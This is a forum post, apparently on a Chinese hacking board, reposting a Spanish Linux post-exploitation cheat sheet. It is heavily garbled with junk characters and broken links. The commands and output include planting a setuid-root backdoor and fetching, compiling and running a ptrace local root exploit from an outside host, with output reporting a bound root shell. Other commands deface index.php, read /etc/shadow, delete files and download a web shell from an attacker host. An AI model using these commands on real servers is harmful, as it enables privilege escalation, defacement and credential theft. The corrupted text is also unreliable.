- 在线时间
- 0 小时
- 最后登录
- 2007-9-23
- 注册时间
- 2004-9-10
- 听众数
- 3
- 收听数
- 0
- 能力
- 0 分
- 体力
- 9975 点
- 威望
- 7 点
- 阅读权限
- 150
- 积分
- 4048
- 相册
- 0
- 日志
- 0
- 记录
- 0
- 帖子
- 1893
- 主题
- 823
- 精华
- 2
- 分享
- 0
- 好友
- 0

我的地盘我做主
该用户从未签到
 |
< ><FONT color=#ff0000>by:cnbird</FONT></P>
& k6 u3 I- q; y$ t; S0 U< >1.</P>( c3 b/ _# P- P; W& D0 E; k* i! R
< >[cnbird@localhost tmp]#id</P>
1 v. Y. [, S7 E9 R/ n< >uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk)</P>4 ~+ y2 Q) o# M4 r" R8 m3 _. @
< >[cnbird@localhost tmp]#cp `which id ` .</P> T1 [ E: G- i9 d
< >[cnbird@localhost tmp]#chown root ./id</P>& r& C$ P) O6 }& z9 q1 J; Y( i
< >[cnbird@localhost tmp]#chmod 755 ./id ; chmod u+s ./id</P> k* N9 v( j8 _2 { d% c6 D, o
< >[cnbird@localhost tmp]#ls -l ./id</P>: [4 c( A3 O9 C W1 G$ X
< >-rwsr-xr-x 1 root root 9264 Mar 8 21:36 ./id*</P>
2 x0 f- x5 ]6 J4 R- w9 c< >[cnbird@localhost tmp]#exit</P>
6 a3 P& R" s# f# M4 X< >[cnbird@localhost tmp]$id</P>- g6 M5 {# { y9 y
< >uid=500(cnbird) gid=500(cnbird) groups=500(cnbird)</P>
$ l* J( r& a& ^, k, ?! ~9 Q< >[cnbird@localhost tmp]$./id </P>
8 [, ]" c [4 U! w2 j9 ?7 P< >uid=500(cnbird) gid=500(cnbird) euid=0(root) groups=500(cnbird)</P>
- R1 d5 n m& J< >2.利用ptrace成为root的方法</P>
" K7 o v$ g( o0 m< >[bash]# cd /tmp/; wget <a href="http://delivered.informaticahispana.org/ptrace.c" target="_blank" ><FONT color=#0000ff>http://delivered.informaticahispana.org/ptrace.c</FONT></A>; gcc ptrace.c -o ptrace; chmod -c 777 ptrace; ./ptrace+ \5 _( k$ y# F% u5 c* a2 E
-> Parent's PID is 2313. Child's PID is 2314.+ Z+ ]& ?% O/ N% ~$ @1 b
-> Attaching to 2315...2 F5 o4 ~1 e& B+ {2 K, Z+ d$ Q8 m
-> Got the thread!!
8 f( g, G2 X* Q' {* X& x9 ?7 q-> Waiting for the next signal..., r2 p8 K) N; C! ~- @# I* K
-> Injecting shellcode at 0x4000e85d: d1 E4 e S/ I- d
-> Bind root shell on port 24876... =p
8 ]. c, `+ O6 W/ B, `4 e" [-> Detached from modprobe thread.1 H* l; N8 y) i
-> Committing suicide.....</P>! n. }+ u; I t/ H: \
< >[bash]# id
3 h+ H: I9 f; Suid=0(root) gid=0(root) groups=0(root)</P>
: p ~% D: E$ q: ~1 L& x< > ara ver los dominios que hay en el server:
* k) s+ ]% T0 x1 H; `- K& Y---------------------------------------------------------
6 |9 X* y5 ]5 I. r$ f( scat /etc/httpd/conf/httpd.conf|grep ServerName << Solo salen los dominios( s! S8 {# _! M, I
cat /etc/httpd/conf/httpd.conf << Unicamente los puros dominios& ~# j4 K Y X5 p
cat /etc/localdomains << Unicamente los dominios locales
1 S$ ?* E0 b( m0 Qcat /etc/trueuserdomains << Revela los verdades propietarios de cada dominio
3 o7 t% N& m V* n7 }1 ]4 _cat /etc/userdomains << Este es el mas comun
; ?1 W5 p1 B$ B r* j# J# ~---------------------------------------------------------</P>
( h( o$ `! ]3 G3 t; u# o( f6 t. A< > ara ver la version de kernel:$ S7 o: m; @# a+ \
---------------------------------------------------------: l8 h6 ]& E* H: Q+ h
uname -a <<Te sale algo asi Linux itys.host4u.net 2.4.20....., 2.4.20 viene siendo la version del kernel.
; Q1 m% H5 v+ b$ \2 N---------------------------------------------------------</P>. h( c' _: ?% t: u+ x- ]
< > ara modificar un index ya existente:
! ]! o+ i- m3 `1 C3 e---------------------------------------------------------" R9 P2 N* y2 ^- @& B
echo "RootBox was OwNz You">index.php <<sobreescribe el archivo index.php con nuevo contenido2 W0 W/ J' k1 k; b/ H
---------------------------------------------------------</P>
# B0 M4 J% j7 }" j2 _; j( g< > ara subir, compilar, darle permisos de ejecucion y ejecutar un exploit:
; d$ `" B2 ?# w; R: [& E% v---------------------------------------------------------
7 |* O. M `$ K/ w; ^cd /tmp/;wget <a href="http://web<a%20href=/" target="_blank" >_</A>atacante/exploit.c"><FONT color=#0000ff>http://web<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>atacante/exploit.c</FONT></A> <<aqui subimos el exploit$ o: m `. @' A n4 t2 j
cd /tmp/;cc exploit.c -o exploit<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>compilado <<aqui lo compilamos con el nombre de "exploit<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>compilado" " y1 X0 |9 X+ P# f/ n# E
cd /tmp/;chmod -c 777 exploit<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>compilado <<aqui le damos permisos de ejecucion a "exploit<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>compilado"
6 Y0 O1 n J& Scd /tmp/;./exploit<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>compilado <<aqui estamos ejecutando a "exploit<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>compilado".
6 |2 ?. _1 {8 T* |0 AHasta aqui termina el proceso para un exploit.
P2 i; @$ U6 y& g5 D( j6 P---------------------------------------------------------</P>8 U4 T0 I8 T% w( t5 s7 t
< >Ver las contraseñas encriptadas de todos los usuarios:
" k+ d% Y' Z0 x# H---------------------------------------------------------
* K" w9 ^* M: Xcat /etc/shadow <<Solo funciona si tienes permisos como root.
& A/ I; Z, g3 }2 M+ [6 s+ z: w: B---------------------------------------------------------</P>2 n Y; c* e. s" y8 V: i3 ]4 _
< >Borrar un Ficher
* z# [ o9 M: s) F! G---------------------------------------------------------
2 Q/ w7 W+ ?9 s- Qcd /home/juan/public<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>html/;rm import.htm<<aqui estan borrando con el comando rm, el fichero import.htm
% \! C* b; ]4 T4 \* m$ B. N) b9 u( B---------------------------------------------------------</P>
$ w; _" t5 s+ |/ X8 b< >Subir un ficher
: Z+ p, i$ o9 h H+ K+ S+ i4 f--------------------------------------------------------- X; d, n# n- \
cd /home/juan/public<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>html/;wget <a href="http://web<a%20href=/" target="_blank" >_</A>atacante/shell.php<<ESTAMOS"><FONT color=#0000ff>http://web<a href="http://hackbase.com/hacker/tutorial/200502039807.htm#" target="_blank" >_</A>atacante/shell.php<<Estamos</FONT></A> subiendo el fichero shell.php</P>
' k1 o2 ^& E4 f; ?< >
! ^6 U2 t( h4 A8 e) k7 k- ^<CENTER></CENTER> |
zan
|